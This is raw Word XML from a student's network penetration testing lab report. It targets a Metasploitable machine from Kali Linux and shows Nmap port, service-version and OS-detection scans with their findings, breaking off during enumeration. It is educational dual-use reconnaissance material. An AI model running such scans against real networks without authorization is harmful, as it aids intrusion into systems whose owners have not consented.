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06AF" w14:textId="77777777" w:rsidR="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network Penetration Testing with Real-World Exploits and Security Remediation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EFC679" w14:textId="04445DB9" w:rsidR="002323AB" w:rsidRPr="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>sanjana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>thawait</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="263CCC8D" w14:textId="19337059" w:rsidR="002323AB" w:rsidRPr="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> ERP: 660</w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>4710</w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DA0256" w14:textId="77777777" w:rsidR="002323AB" w:rsidRPr="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Course: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>B.Tech</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSE (Cybersecurity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019643E5" w14:textId="77777777" w:rsidR="002323AB" w:rsidRPr="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Semester: 4th </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF45B70" w14:textId="77777777" w:rsidR="002323AB" w:rsidRPr="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Section: CY4A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F63FC29" w14:textId="77777777" w:rsidR="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Date: 1</w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>/05/2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331FCF7" w14:textId="77777777" w:rsidR="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">                                        </w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Project objectives </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D698BC" w14:textId="77777777" w:rsidR="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FDBA97" w14:textId="5FF151A9" w:rsidR="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Project objectives This project is based on performing penetration testing in a controlled lab environment to simulate attacks that hackers may use to exploit real systems. Using Kali Linux as the attack platform and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the vulnerable target system, I explore various stages of ethical hacking including scanning, enumeration, exploitation, privilege escalation, and remediation. The purpose is to gain hands-on experience in identifying, exploiting, and mitigating vulnerabilities responsibly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E1ACF3" w14:textId="77777777" w:rsidR="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Theory about the project:</w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736E2046" w14:textId="77777777" w:rsidR="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Network penetration testing is the process of evaluating a system’s network security by simulating attacks from malicious outsiders and insiders. The goal is to find security loopholes before attackers do. It includes multiple phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A01E9" w14:textId="77777777" w:rsidR="002323AB" w:rsidRP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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance: Gathering information about the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E326F28" w14:textId="77777777" w:rsidR="002323AB" w:rsidRP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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanning &amp; Enumeration: Actively probing to find open ports, services, and vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F089343" w14:textId="77777777" w:rsidR="002323AB" w:rsidRP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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation: Gaining unauthorized access using known exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B592ED" w14:textId="77777777" w:rsidR="002323AB" w:rsidRP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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Post-Exploitation: Activities like privilege escalation or data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6117946C" w14:textId="47064C9A" w:rsid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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remediation: Providing security measures to patch vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4441FF8D" w14:textId="77777777" w:rsidR="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Project requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1164D884" w14:textId="77777777" w:rsid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>Two Operating System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB29BF8" w14:textId="32F58E67" w:rsidR="002323AB" w:rsidRP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 xml:space="preserve"> 1. Kali Linux (Attacking machine) 2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine (Target Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493DB90F" w14:textId="2FB1B234" w:rsidR="002323AB" w:rsidRPr="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC1DDB6" w14:textId="1A4316F6" w:rsidR="002323AB" w:rsidRP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 xml:space="preserve">Kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AF6BDEB" w14:textId="128DC25B" w:rsidR="002323AB" w:rsidRPr="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6900BA2B" w14:textId="1AEB8B58" w:rsidR="002323AB" w:rsidRP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>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC16DC9" w14:textId="06B6053E" w:rsidR="002323AB" w:rsidRPr="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1608B3CE" w14:textId="05F79DE2" w:rsidR="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>John the riper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F96E3" w14:textId="26CC5C3B" w:rsidR="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="002323AB">
        <w:rPr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</w:p>
    <w:p w14:paraId="225A323A" w14:textId="77777777" w:rsidR="002323AB" w:rsidRPr="002323AB" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002323AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Network Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAC5364" w14:textId="08FB0E24" w:rsidR="002323AB" w:rsidRPr="003264A3" w:rsidRDefault="002323AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003264A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Task 1: Basic Network Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60882B83" w14:textId="2A5AD8D6" w:rsidR="00850F2D" w:rsidRPr="00850F2D" w:rsidRDefault="00850F2D" w:rsidP="00850F2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Nmap -v 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEEF1D0" w14:textId="38945FC8" w:rsidR="00850F2D" w:rsidRPr="002323AB" w:rsidRDefault="00850F2D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F2B5C64" wp14:editId="4A9FCE20">
            <wp:extent cx="5013960" cy="6890802"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="95374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3644" name="Picture 953743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50" cy="69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8548" w14:textId="77777777" w:rsidR="00850F2D" w:rsidRDefault="00850F2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task2: Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F3E587" w14:textId="0EB9389F" w:rsidR="00850F2D" w:rsidRDefault="00850F2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scanning for hidden ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BF61F7" w14:textId="0E7B22EC" w:rsidR="00850F2D" w:rsidRDefault="00850F2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pP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-v -p- 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41409AA7" w14:textId="45391942" w:rsidR="00850F2D" w:rsidRDefault="001C2C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8AD1D8" wp14:editId="46A325D0">
            <wp:extent cx="4084320" cy="4937731"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="305895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95821" name="Picture 305895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075" cy="49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3E33" w14:textId="77777777" w:rsidR="00850F2D" w:rsidRDefault="00850F2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA66EAB" w14:textId="77777777" w:rsidR="001C2CDD" w:rsidRDefault="001C2CDD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C2CDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Total Hidden Ports = 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D115C7C" w14:textId="77777777" w:rsidR="001C2CDD" w:rsidRPr="001C2CDD" w:rsidRDefault="001C2CDD">
      <w:r w:rsidRPr="001C2CDD">
        <w:t xml:space="preserve"> List of hidden ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04534C7B" w14:textId="77777777" w:rsidR="001C2CDD" w:rsidRPr="001C2CDD" w:rsidRDefault="001C2CDD">
      <w:r w:rsidRPr="001C2CDD">
        <w:t xml:space="preserve"> 1. 8787</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0D10F" w14:textId="77777777" w:rsidR="001C2CDD" w:rsidRPr="001C2CDD" w:rsidRDefault="001C2CDD">
      <w:r w:rsidRPr="001C2CDD">
        <w:t xml:space="preserve"> 2. 36588</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7560DC72" w14:textId="77777777" w:rsidR="001C2CDD" w:rsidRPr="001C2CDD" w:rsidRDefault="001C2CDD">
      <w:r w:rsidRPr="001C2CDD">
        <w:t xml:space="preserve"> 3. 53204</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38925FA3" w14:textId="77777777" w:rsidR="001C2CDD" w:rsidRPr="001C2CDD" w:rsidRDefault="001C2CDD">
      <w:r w:rsidRPr="001C2CDD">
        <w:t xml:space="preserve"> 4. 53452</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597E8BED" w14:textId="77777777" w:rsidR="001C2CDD" w:rsidRPr="001C2CDD" w:rsidRDefault="001C2CDD">
      <w:r w:rsidRPr="001C2CDD">
        <w:t xml:space="preserve"> 5. 59437</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED59D03" w14:textId="77777777" w:rsidR="001C2CDD" w:rsidRPr="001C2CDD" w:rsidRDefault="001C2CDD">
      <w:r w:rsidRPr="001C2CDD">
        <w:t xml:space="preserve"> 6. 3632</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC74F83" w14:textId="77777777" w:rsidR="001C2CDD" w:rsidRPr="001C2CDD" w:rsidRDefault="001C2CDD">
      <w:r w:rsidRPr="001C2CDD">
        <w:t xml:space="preserve"> 7. 6697</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B604816" w14:textId="77777777" w:rsidR="001C2CDD" w:rsidRPr="001C2CDD" w:rsidRDefault="001C2CDD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C2CDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Task 2: Service Version Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B087CB" w14:textId="795667F6" w:rsidR="0013646E" w:rsidRDefault="001C2CDD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C2CDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C2CDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C2CDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -v -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C2CDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C2CDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FE65A6" w14:textId="77777777" w:rsidR="0013646E" w:rsidRDefault="0013646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9E8DC4" wp14:editId="74B3C1D7">
            <wp:extent cx="4496327" cy="3931920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="336028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8322" name="Picture 3360283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23" cy="39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2C9D" w14:textId="77777777" w:rsidR="0013646E" w:rsidRDefault="0013646E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013646E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3: Operating System Detection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E54295" w14:textId="30D77CC4" w:rsidR="0013646E" w:rsidRDefault="0013646E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013646E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013646E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -v -O 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C0D816" w14:textId="77777777" w:rsidR="0013646E" w:rsidRDefault="0013646E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013646E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Output:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F9AAC" w14:textId="77777777" w:rsidR="0013646E" w:rsidRDefault="0013646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5BD763" wp14:editId="29737076">
            <wp:extent cx="3134381" cy="3215640"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="977831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1714" name="Picture 9778317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921" cy="32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9914" w14:textId="3399402C" w:rsidR="0013646E" w:rsidRDefault="0013646E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013646E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0013646E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CCB1E3" w14:textId="06CEB34C" w:rsidR="0013646E" w:rsidRDefault="0013646E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013646E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Target IP Address – 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>56.103</w:t>
      </w:r>
      <w:r w:rsidRPr="0013646E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FF08E6" w14:textId="024ADC02" w:rsidR="0013646E" w:rsidRDefault="0013646E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013646E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Operating System Details </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE11103" w14:textId="77777777" w:rsidR="0013646E" w:rsidRPr="0088446E" w:rsidRDefault="0013646E">
      <w:r w:rsidRPr="0088446E">
        <w:t xml:space="preserve"> MAC Address: 00:0C:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0088446E">
        <w:t>29:AB</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0088446E">
        <w:t xml:space="preserve">:A7:B8 (VMware) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322F5E9E" w14:textId="77777777" w:rsidR="0013646E" w:rsidRPr="0088446E" w:rsidRDefault="0013646E">
      <w:r w:rsidRPr="0088446E">
        <w:t xml:space="preserve">Device type: general purpose </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62584D39" w14:textId="77777777" w:rsidR="0013646E" w:rsidRPr="0088446E" w:rsidRDefault="0013646E">
      <w:r w:rsidRPr="0088446E">
